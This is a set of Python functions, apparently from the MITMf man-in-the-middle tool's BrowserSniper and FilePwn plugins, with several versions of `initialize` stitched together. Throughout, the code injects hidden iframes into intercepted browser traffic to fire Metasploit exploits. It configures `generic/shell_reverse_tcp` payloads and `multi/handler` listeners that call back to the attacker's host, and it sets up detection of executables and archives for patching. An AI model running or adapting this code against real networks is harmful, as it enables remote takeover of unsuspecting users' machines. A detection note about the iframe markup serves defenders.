def injectAndPoll(self, ip, inject_payload):
    '''Swap in the iframe markup for *ip* and wait for a Metasploit session.

    ``self.html_payload`` is set to *inject_payload*, which temporarily
    replaces the markup the BrowserProfiler plugin injects. Metasploit is
    then asked every 2 seconds whether a session from *ip* exists, so a
    session from any other peer does not count. When one is found, *ip* is
    appended to ``self.sploited_ips`` (also bound to ``self.black_ips``) so
    the host is not injected again. In both outcomes ``self.html_payload``
    is reset to ``self.get_payload()``.

    NOTE(review): the loop performs 29 checks (about 58 seconds), while the
    log message below reports 60 seconds.
    '''
    mitmf_logger.info("{} [BrowserSniper] Now injecting iframe to trigger exploits".format(ip))
    # Temporarily changes the code that the BrowserProfiler plugin injects.
    self.html_payload = inject_payload

    mitmf_logger.info('{} [BrowserSniper] Waiting for ze shellz, sit back and relax...'.format(ip))

    msf = Msf()
    for _attempt in range(1, 30):
        if not msf.sessionsfrompeer(ip):
            sleep(2)
            continue

        mitmf_logger.info("{} [BrowserSniper] Client haz been 0wn3d! Enjoy!".format(ip))
        self.sploited_ips.append(ip)
        # black_ips is the same list object as sploited_ips, not a copy.
        self.black_ips = self.sploited_ips
        # Restore the regular BrowserProfiler payload.
        self.html_payload = self.get_payload()
        return

    mitmf_logger.info("{} [BrowserSniper] Session not established after 60 seconds".format(ip))
    # Restore the regular BrowserProfiler payload.
    self.html_payload = self.get_payload()
def snipe(self):
    '''Loop forever, turning each profiled client into an iframe injection.

    Once per second, when ``self.output`` holds a client profile:

    * if ``self.getExploits()`` returns nothing, the client's address is
      added to ``self.sploited_ips`` / ``self.black_ips`` so it is skipped
      from then on;
    * otherwise, for a client not yet in ``self.sploited_ips``, one hidden
      iframe per matching exploit is built and handed to ``injectAndPoll``.

    Detection note: the markup is produced with ``str.format``, which leaves
    ``%%`` untouched, so every injected iframe carries the literal text
    ``height=0%% width=0%%`` and points at ``self.msfip``.
    '''
    iframe_template = "<iframe src='http://{}:{}{}' height=0%% width=0%%></iframe>"

    while True:
        if self.output:
            vic_ip = self.output['ip']
            msfport = self.config['MITMf']['Metasploit']['msfport']
            exploits = self.getExploits()
            already_handled = vic_ip in self.sploited_ips

            if not exploits:
                if not already_handled:
                    mitmf_logger.info('{} [BrowserSniper] Client not vulnerable to any exploits, adding to blacklist'.format(vic_ip))
                    self.sploited_ips.append(vic_ip)
                    self.black_ips = self.sploited_ips

            elif not already_handled:
                mitmf_logger.info("{} [BrowserSniper] Client vulnerable to {} exploits".format(vic_ip, len(exploits)))

                frames = []
                msf = Msf()
                for exploit in exploits:
                    pid = msf.findpid(exploit)
                    if pid:
                        # The module already runs as a job: reuse its URI path.
                        mitmf_logger.info('{} [BrowserSniper] {} already started'.format(vic_ip, exploit))
                        url = msf.jobinfo(pid)['uripath']
                        port = msfport
                    else:
                        url, port = self._setupExploit(exploit, msfport)
                    frames.append(iframe_template.format(self.msfip, port, url))

                self.injectAndPoll(vic_ip, ''.join(frames))

        sleep(1)
def setupMSF(self):
    '''Start one ``exploit/multi/handler`` job per configured target.

    For each of the six platform configurations a console command block is
    built from its ``MSFPAYLOAD``, ``HOST`` and ``PORT`` values and sent to
    Metasploit. If a ``multi/handler`` job already exists with the same
    payload and LPORT but a different lhost, that job is killed before the
    command is sent; in every other case the command is sent as is.
    '''
    msf = Msf()
    target_configs = (
        self.LinuxIntelx86,
        self.LinuxIntelx64,
        self.WindowsIntelx86,
        self.WindowsIntelx64,
        self.MachoIntelx86,
        self.MachoIntelx64,
    )
    # Each line ends with a newline because the console treats it as Enter.
    command_template = (
        "use exploit/multi/handler\n"
        "set payload {}\n"
        "set LHOST {}\n"
        "set LPORT {}\n"
        "set ExitOnSession False\n"
        "exploit -j\n"
    )

    for config in target_configs:
        cmd = command_template.format(config["MSFPAYLOAD"], config["HOST"], config["PORT"])

        pid = msf.findpid('multi/handler')
        if pid:
            info = msf.jobinfo(pid)
            # NOTE(review): the datastore is read with mixed-case keys
            # ('payload', 'LPORT', 'lhost') — confirm against what jobinfo returns.
            stale_listener = (
                info['datastore']['payload'] == config["MSFPAYLOAD"]
                and info['datastore']['LPORT'] == config["PORT"]
                and info['datastore']['lhost'] != config['HOST']
            )
            if stale_listener:
                msf.killjob(pid)

        msf.sendcommand(cmd)
def initialize(self, options):
    '''Called if the plugin is enabled; receives the options namespace.

    Stores the options, creates the queue used for patched files, connects
    to Metasploit, defines the MIME-type tables for binaries and archives,
    loads the FilePwn configuration and starts ``self.setup_msf`` on a
    daemon thread.
    '''
    def archive_type(mimes, kind, fmt, flt):
        # Descriptor shape shared by all archive types below.
        return {'mimes': mimes, 'params': {'type': kind, 'format': fmt, 'filter': flt}}

    self.options = options
    self.patched = multiprocessing.Queue()

    from core.msfrpc import Msf
    self.msf = Msf()

    # MIME types treated as executable downloads.
    self.binaryMimeType = {
        'mimes': [
            'application/octet-stream',
            'application/x-msdownload',
            'application/x-msdos-program',
            'binary/octet-stream',
            'application/x-executable',
            'application/x-dosexec',
        ]
    }

    # .zip
    self.zipType = archive_type(['application/x-zip-compressed', 'application/zip'], 'ZIP', 'zip', None)
    # .gz
    self.gzType = archive_type(['application/gzip', 'application/x-gzip', 'application/gnutar'], 'TAR', 'ustar', 'gzip')
    # .tar
    self.tarType = archive_type(['application/x-tar'], 'TAR', 'gnutar', None)
    # .bz / .bz2
    self.bzType = archive_type(['application/x-bzip2', 'application/x-bzip'], 'TAR', 'gnutar', 'bzip2')

    self.archiveTypes = [self.zipType, self.gzType, self.tarType, self.bzType]

    # FilePwn options
    self.set_config()
    self.parse_target_config(self.user_config['targets']['ALL'])

    self.tree_info.append("Connected to Metasploit v{}".format(self.msf.version))

    # Handler setup runs in the background on a daemon thread.
    setup_thread = threading.Thread(name='setup_msf', target=self.setup_msf)
    setup_thread.setDaemon(True)
    setup_thread.start()
def initialize(self, options):
    '''Prepare the plugin: record options, resolve the local IP, init the profiler.

    ``self.msfip`` is taken from the interface named in *options*, and
    ``self.sploited_ips`` starts empty. The BrowserProfiler initialiser is
    then run on this instance, and the Metasploit version is queried and
    added to ``self.tree_info``.
    '''
    self.options = options
    self.msfip = SystemConfig.getIP(options.interface)
    # IPs of clients that were exploited or found not vulnerable, so they
    # are not processed again.
    self.sploited_ips = []

    # Initialize the BrowserProfiler plugin
    BrowserProfiler.initialize(self, options)

    reported_version = Msf().version()
    self.tree_info.append("Connected to Metasploit v{}".format(reported_version))
def initialize(self, options):
    '''Prepare the plugin and start the ``snipe`` loop on a daemon thread.

    ``self.msfip`` comes from ``options.ip`` and ``self.sploited_ips`` starts
    empty. After the BrowserProfiler initialiser has run on this instance, a
    Metasploit connection is opened, its version is added to
    ``self.tree_info`` and ``self.snipe`` is started in the background.
    '''
    self.options = options
    self.msfip = options.ip
    # IPs of clients that were exploited or found not vulnerable, so they
    # are not processed again.
    self.sploited_ips = []

    # Initialize the BrowserProfiler plugin
    BrowserProfiler.initialize(self, options)

    from core.msfrpc import Msf
    self.msf = Msf()
    self.tree_info.append("Connected to Metasploit v{}".format(self.msf.version))

    sniper_thread = threading.Thread(name='sniper', target=self.snipe)
    sniper_thread.setDaemon(True)
    sniper_thread.start()
def initialize(self, options):
    '''Called if the plugin is enabled; receives the options namespace.

    Defines the file-signature table used to recognise binaries and
    archives, copies the FilePwn settings from ``self.config`` onto the
    instance, records the Metasploit version in ``self.tree_info`` and
    starts ``self.setupMSF`` on a daemon thread.

    The ``str.decode('hex')`` calls are Python 2 only.
    '''
    def signature(number, offset=0):
        # One table entry: the magic bytes and the offset where they appear.
        return {'number': number, 'offset': offset}

    self.options = options
    self.patched = multiprocessing.Queue()

    # FOR FUTURE USE
    self.binaryMimeTypes = [
        "application/octet-stream",
        'application/x-msdownload',
        'application/x-msdos-program',
        'binary/octet-stream',
    ]

    # FOR FUTURE USE
    self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']

    # USED NOW
    self.magicNumbers = {
        'elf': signature('7f454c46'.decode('hex')),
        'pe': signature('MZ'),
        'gz': signature('1f8b'.decode('hex')),
        'bz': signature('BZ'),
        'zip': signature('504b0304'.decode('hex')),
        'tar': signature('ustar', 257),
        'fatfile': signature('cafebabe'.decode('hex')),
        'machox64': signature('cffaedfe'.decode('hex')),
        'machox86': signature('cefaedfe'.decode('hex')),
    }

    # A `supportedBins` tuple was commented out here ("NOT USED NOW") and is
    # deliberately not assigned.

    # FilePwn options
    self.userConfig = self.config['FilePwn']
    all_targets = self.userConfig['targets']['ALL']
    for option in (
        'FileSizeMax',
        'WindowsIntelx86',
        'WindowsIntelx64',
        'WindowsType',
        'LinuxIntelx86',
        'LinuxIntelx64',
        'LinuxType',
        'MachoIntelx86',
        'MachoIntelx64',
        'FatPriority',
    ):
        # Each setting becomes an attribute with the same name as its key.
        setattr(self, option, all_targets[option])

    self.zipblacklist = self.userConfig['ZIP']['blacklist']
    self.tarblacklist = self.userConfig['TAR']['blacklist']

    reported_version = Msf().version()
    self.tree_info.append("Connected to Metasploit v{}".format(reported_version))

    setup_thread = threading.Thread(name='setupMSF', target=self.setupMSF)
    setup_thread.setDaemon(True)
    setup_thread.start()
def _setupExploit(self, exploit, msfport):
    '''Send the console commands that start *exploit* as a background job.

    The module is configured with ``SRVPORT`` = *msfport*, a URI path from
    ``self._genRandURL()``, the ``generic/shell_reverse_tcp`` payload,
    ``LHOST`` = ``self.msfip`` and an ``LPORT`` from ``self._getRandPort()``.

    Returns:
        tuple: ``(rand_url, rand_port)`` — the URIPATH and LPORT values used.
    '''
    rand_url = self._genRandURL()
    rand_port = self._getRandPort()

    # Command text for the virtual console. Every entry must end with a
    # newline, because that is what simulates the user pressing Enter.
    console_lines = [
        "use exploit/{}".format(exploit),
        "set SRVPORT {}".format(msfport),
        "set URIPATH {}".format(rand_url),
        "set PAYLOAD generic/shell_reverse_tcp",
        "set LHOST {}".format(self.msfip),
        "set LPORT {}".format(rand_port),
        "set ExitOnSession False",
        "exploit -j",
    ]
    cmd = "\n".join(console_lines) + "\n"

    Msf().sendcommand(cmd)

    return (rand_url, rand_port)
def initialize(self, options):
    '''Called if the plugin is enabled; receives the options namespace.

    Connects to Metasploit, defines the file-signature table used to
    recognise binaries and archives, loads the FilePwn host, keyword and
    archive black/white lists from ``self.config``, parses the ``ALL``
    target section and starts ``self.setup_msf`` on a daemon thread.

    The ``str.decode('hex')`` calls are Python 2 only.
    '''
    def signature(number, offset=0):
        # One table entry: the magic bytes and the offset where they appear.
        return {'number': number, 'offset': offset}

    self.options = options
    self.patched = multiprocessing.Queue()

    from core.msfrpc import Msf
    self.msf = Msf()

    # FOR FUTURE USE
    self.binaryMimeTypes = [
        "application/octet-stream",
        'application/x-msdownload',
        'application/x-msdos-program',
        'binary/octet-stream',
    ]

    # FOR FUTURE USE
    self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']

    # USED NOW
    self.magicNumbers = {
        'elf': signature('7f454c46'.decode('hex')),
        'pe': signature('MZ'),
        'gz': signature('1f8b'.decode('hex')),
        'bz': signature('BZ'),
        'zip': signature('504b0304'.decode('hex')),
        'tar': signature('ustar', 257),
        'fatfile': signature('cafebabe'.decode('hex')),
        'machox64': signature('cffaedfe'.decode('hex')),
        'machox86': signature('cefaedfe'.decode('hex')),
    }

    # NOT USED NOW
    self.supportedBins = ('MZ', '7f454c46'.decode('hex'))

    # FilePwn options
    self.userConfig = self.config['FilePwn']

    host_rules = self.userConfig['hosts']
    self.hostblacklist = host_rules['blacklist']
    self.hostwhitelist = host_rules['whitelist']

    keyword_rules = self.userConfig['keywords']
    self.keysblacklist = keyword_rules['blacklist']
    self.keyswhitelist = keyword_rules['whitelist']

    self.zipblacklist = self.userConfig['ZIP']['blacklist']
    self.tarblacklist = self.userConfig['TAR']['blacklist']
    self.parse_target_config(self.userConfig['targets']['ALL'])

    self.tree_info.append("Connected to Metasploit v{}".format(self.msf.version))

    setup_thread = threading.Thread(name='setup_msf', target=self.setup_msf)
    setup_thread.setDaemon(True)
    setup_thread.start()